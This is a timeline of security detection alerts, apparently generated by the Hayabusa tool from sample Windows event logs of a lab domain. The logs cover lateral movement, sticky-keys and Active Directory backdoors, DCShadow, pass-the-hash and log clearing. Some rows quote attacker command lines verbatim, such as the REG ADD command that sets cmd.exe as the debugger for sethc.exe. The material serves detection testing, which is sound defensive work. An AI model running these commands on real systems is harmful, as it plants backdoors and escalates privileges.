2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:25:38.481 
+09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" 2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" 2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" 2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to 
specified service, any protocol).evtx" 2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" 2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry 
update.evtx" 2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 18:17:37.439 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx 2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege 
Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx 2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx 2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx 2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" 2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: 
SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx 2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component 
Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" 2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC 
Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" 2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 
10.23.23.9 | LID: 0x2847721c,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig 
| Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx 2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 